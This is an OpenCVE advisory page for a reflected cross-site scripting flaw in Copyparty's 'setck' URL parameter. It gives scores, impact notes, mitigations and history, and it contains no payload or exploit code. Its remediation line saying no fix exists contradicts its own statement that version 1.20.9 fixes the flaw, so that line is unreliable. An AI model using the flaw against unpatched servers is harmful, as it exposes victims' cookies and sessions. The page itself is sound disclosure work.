Description
Copyparty is a portable file server. In versions prior to 1.20.9, an XSS allows for reflected cross-site scripting via URL-parameter `?setck=...`. Version 1.20.9 fixes the issue.
Published: 2026-02-26
Score: 5.4 Medium
EPSS: < 1% Very Low
KEV: No
Impact: Reflected Cross‑Site Scripting
Action: Patch
AI Analysis

Impact

Copyparty, a portable file server, has a reflected cross‑site scripting flaw in its setck URL parameter. The vulnerability allows an attacker to inject malicious JavaScript that executes in the victim’s browser, potentially exposing cookies, session tokens, or other sensitive data. This flaw falls under the input‑validation weakness identified as CWE‑79.

Affected Systems

Versions of Copyparty less than 1.20.9 are affected. The software is available as a self‑hosted file sharing service.

Risk and Exploitability

The CVSS score of 5.4 indicates a moderate risk, while the EPSS score of less than 1% shows that the probability of exploitation is very low at present. The flaw is not listed in the CISA KEV catalog. Based on the description, it is inferred that an attacker must supply a crafted URL containing the setck parameter and persuade a victim to visit the link, making user interaction a prerequisite for exploitation. Nonetheless, the impact on confidentiality warrants prompt remedial action.

Generated by OpenCVE AI on April 18, 2026 at 17:36 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Upgrade Copyparty to version 1.20.9 or later, where the vulnerable setck parameter handling has been fixed
  • If an immediate upgrade is not feasible, restrict public access to the server and enforce authentication to limit the attacker’s ability to deliver malicious URLs
  • Apply appropriate content‑security‑policy headers and ensure that all user‑supplied input is properly escaped before rendering

Generated by OpenCVE AI on April 18, 2026 at 17:36 UTC.

Tracking

Sign in to view the affected projects.

Advisories
Source ID Title
Github GHSA Github GHSA GHSA-62cr-6wp5-q43h Copyparty vulnerable to reflected XSS via setck parameter
History

Sat, 28 Feb 2026 01:00:00 +0000

Type Values Removed Values Added
CPEs cpe:2.3:a:9001:copyparty:*:*:*:*:*:*:*:*

Fri, 27 Feb 2026 17:15:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}

Thu, 26 Feb 2026 13:30:00 +0000

Type Values Removed Values Added
First Time appeared 9001
9001 copyparty
Vendors & Products 9001
9001 copyparty

Thu, 26 Feb 2026 02:15:00 +0000

Type Values Removed Values Added
Description Copyparty is a portable file server. In versions prior to 1.20.9, an XSS allows for reflected cross-site scripting via URL-parameter `?setck=...`. Version 1.20.9 fixes the issue.
Title Copyparty vulnerable to eflected cross-site scripting via setck parameter
Weaknesses CWE-79
References
Metrics cvssV3_1

{'score': 5.4, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N'}

Subscriptions

9001 Copyparty
cve-icon MITRE

Status: PUBLISHED

Assigner: GitHub_M

Published:

Updated: 2026-02-26T15:07:56.702Z

Reserved: 2026-02-25T03:11:36.690Z

Link: CVE-2026-27948

cve-icon Vulnrichment

Updated: 2026-02-26T15:06:30.004Z

cve-icon NVD

Status : Analyzed

Published: 2026-02-26T02:16:22.733

Modified: 2026-02-28T00:56:59.110

Link: CVE-2026-27948

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-04-18T17:45:06Z

Weaknesses